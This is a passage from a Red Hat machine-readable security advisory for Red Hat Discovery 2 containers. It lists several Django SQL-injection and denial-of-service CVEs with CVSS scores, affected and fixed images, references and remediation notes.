"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: prototype pollution in _.unset and _.omit functions"
},
{
"cve": "CVE-2025-14550",
"cwe": {
"id": "CWE-167",
"name": "Improper Handling of Additional Special Element"
},
"discovery_date": "2026-02-03T15:01:12.970018+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2436341"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Django. A remote attacker can exploit this vulnerability by sending a crafted request containing multiple duplicate headers to the ASGIRequest component. This can lead to a potential Denial of Service (DoS), making the affected system unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Django: Django: Denial of Service via crafted request with duplicate headers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This MODERATE impact denial-of-service flaw in Django affects Red Hat products utilizing the ASGIRequest component, such as Red Hat Ansible Automation Platform, Red Hat Discovery, and Red Hat Satellite. A remote attacker could send specially crafted requests containing duplicate headers, potentially rendering the affected system unavailable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-14550"
},
{
"category": "external",
"summary": "RHBZ#2436341",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436341"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-14550",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14550"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-14550",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14550"
},
{
"category": "external",
"summary": "https://docs.djangoproject.com/en/dev/releases/security/",
"url": "https://docs.djangoproject.com/en/dev/releases/security/"
},
{
"category": "external",
"summary": "https://groups.google.com/g/django-announce",
"url": "https://groups.google.com/g/django-announce"
},
{
"category": "external",
"summary": "https://www.djangoproject.com/weblog/2026/feb/03/security-releases/",
"url": "https://www.djangoproject.com/weblog/2026/feb/03/security-releases/"
}
],
"release_date": "2026-02-03T14:38:15.875000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-12T22:32:47+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:2694"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "Django: Django: Denial of Service via crafted request with duplicate headers"
},
{
"cve": "CVE-2026-1207",
"cwe": {
"id": "CWE-89",
"name": "Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)"
},
"discovery_date": "2026-02-03T15:00:58.388707+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2436338"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Django. A remote attacker could inject SQL commands by manipulating the band index parameter during raster lookups on `RasterField` (only implemented on PostGIS). This SQL injection vulnerability could lead to unauthorized information disclosure, data alteration, or denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Django: Django: SQL Injection via RasterField band index parameter",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This IMPORTANT flaw affects Django\u0027s `RasterField` when utilized with PostGIS, allowing remote SQL injection via the band index parameter. Red Hat Ansible Automation Platform, Red Hat Discovery, Red Hat Satellite, Insights, and Ansible Services are impacted if configured to use Django with PostGIS `RasterField` lookups. Successful exploitation could lead to unauthorized data access, modification, or denial of service.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1207"
},
{
"category": "external",
"summary": "RHBZ#2436338",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436338"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1207",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1207"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1207",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1207"
},
{
"category": "external",
"summary": "https://docs.djangoproject.com/en/dev/releases/security/",
"url": "https://docs.djangoproject.com/en/dev/releases/security/"
},
{
"category": "external",
"summary": "https://groups.google.com/g/django-announce",
"url": "https://groups.google.com/g/django-announce"
},
{
"category": "external",
"summary": "https://www.djangoproject.com/weblog/2026/feb/03/security-releases/",
"url": "https://www.djangoproject.com/weblog/2026/feb/03/security-releases/"
}
],
"release_date": "2026-02-03T14:35:33.721000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-12T22:32:47+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:2694"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Django: Django: SQL Injection via RasterField band index parameter"
},
{
"cve": "CVE-2026-1285",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-02-03T15:01:06.283620+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2436340"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Django. A remote attacker can exploit this vulnerability by providing crafted inputs containing a large number of unmatched HTML end tags to the `django.utils.text.Truncator.chars()` and `Truncator.words()` methods (when `html=True`), or through the `truncatechars_html` and `truncatewords_html` template filters. This can lead to a denial-of-service (DoS) condition, making the application unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Django: Django: Denial of Service via crafted HTML inputs",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a MODERATE impact denial-of-service flaw in Django. Applications utilizing Django that process untrusted HTML inputs with a large number of unmatched end tags through the `Truncator.chars()` or `Truncator.words()` methods (with `html=True`), or the `truncatechars_html` and `truncatewords_html` template filters, may experience resource exhaustion. This can lead to the application becoming unavailable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1285"
},
{
"category": "external",
"summary": "RHBZ#2436340",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436340"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1285",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1285"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1285",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1285"
},
{
"category": "external",
"summary": "https://docs.djangoproject.com/en/dev/releases/security/",
"url": "https://docs.djangoproject.com/en/dev/releases/security/"
},
{
"category": "external",
"summary": "https://groups.google.com/g/django-announce",
"url": "https://groups.google.com/g/django-announce"
},
{
"category": "external",
"summary": "https://www.djangoproject.com/weblog/2026/feb/03/security-releases/",
"url": "https://www.djangoproject.com/weblog/2026/feb/03/security-releases/"
}
],
"release_date": "2026-02-03T14:35:50.254000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-12T22:32:47+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:2694"
},
{
"category": "workaround",
"details": "To mitigate this issue, applications utilizing Django should avoid processing untrusted HTML content through the `django.utils.text.Truncator.chars()` and `Truncator.words()` methods with `html=True`, or the `truncatechars_html` and `truncatewords_html` template filters. Restrict the use of these functions to only trusted inputs where the HTML structure is controlled and validated.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "Django: Django: Denial of Service via crafted HTML inputs"
},
{
"cve": "CVE-2026-1287",
"cwe": {
"id": "CWE-89",
"name": "Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)"
},
"discovery_date": "2026-02-03T15:01:03.441713+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2436339"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Django. This vulnerability allows a remote attacker to perform SQL injection by using specially crafted control characters within column aliases. When these crafted aliases are passed through dictionary expansion to `QuerySet` methods like `annotate()` or `values()`, it can lead to the execution of arbitrary SQL commands. This could result in unauthorized access to sensitive data or modification of information within the database.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Django: Django: SQL Injection via crafted column aliases",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This IMPORTANT SQL injection flaw in Django allows a remote attacker to execute arbitrary SQL commands by crafting column aliases. This vulnerability affects Red Hat products that incorporate Django, such as Red Hat Ansible Automation Platform, Red Hat Discovery, Red Hat Satellite, Insights, and Ansible Services, potentially leading to unauthorized data access or modification.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1287"
},
{
"category": "external",
"summary": "RHBZ#2436339",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436339"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1287",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1287"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1287",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1287"
},
{
"category": "external",
"summary": "https://docs.djangoproject.com/en/dev/releases/security/",
"url": "https://docs.djangoproject.com/en/dev/releases/security/"
},
{
"category": "external",
"summary": "https://groups.google.com/g/django-announce",
"url": "https://groups.google.com/g/django-announce"
},
{
"category": "external",
"summary": "https://www.djangoproject.com/weblog/2026/feb/03/security-releases/",
"url": "https://www.djangoproject.com/weblog/2026/feb/03/security-releases/"
}
],
"release_date": "2026-02-03T14:36:03.630000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-12T22:32:47+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:2694"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Django: Django: SQL Injection via crafted column aliases"
},
{
"cve": "CVE-2026-1312",
"cwe": {
"id": "CWE-89",
"name": "Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)"
},
"discovery_date": "2026-02-03T15:01:18.274166+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2436342"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Django. A remote attacker could exploit a SQL injection vulnerability in the `.QuerySet.order_by()` method. This occurs when column aliases containing periods are used, and the same alias is also present in `FilteredRelation` via a specially crafted dictionary. Successful exploitation could lead to unauthorized information disclosure or arbitrary code execution within the database.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Django: Django: SQL injection via crafted column aliases in QuerySet.order_by()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This IMPORTANT vulnerability in Django allows for SQL injection within the `QuerySet.order_by()` method. A remote attacker could exploit this by providing crafted column aliases that include periods, specifically when used with `FilteredRelation`. Successful exploitation may result in unauthorized information disclosure or arbitrary code execution against the underlying database. This affects Red Hat products that integrate Django, such as Red Hat Ansible Automation Platform and Red Hat Satellite.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1312"
},
{
"category": "external",
"summary": "RHBZ#2436342",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436342"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1312",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1312"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1312",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1312"
},
{
"category": "external",
"summary": "https://docs.djangoproject.com/en/dev/releases/security/",
"url": "https://docs.djangoproject.com/en/dev/releases/security/"
},
{
"category": "external",
"summary": "https://groups.google.com/g/django-announce",
"url": "https://groups.google.com/g/django-announce"
},
{
"category": "external",
"summary": "https://www.djangoproject.com/weblog/2026/feb/03/security-releases/",
"url": "https://www.djangoproject.com/weblog/2026/feb/03/security-releases/"
}
],
"release_date": "2026-02-03T14:36:23.257000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-12T22:32:47+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"restart_required": {
"category": "none"
},
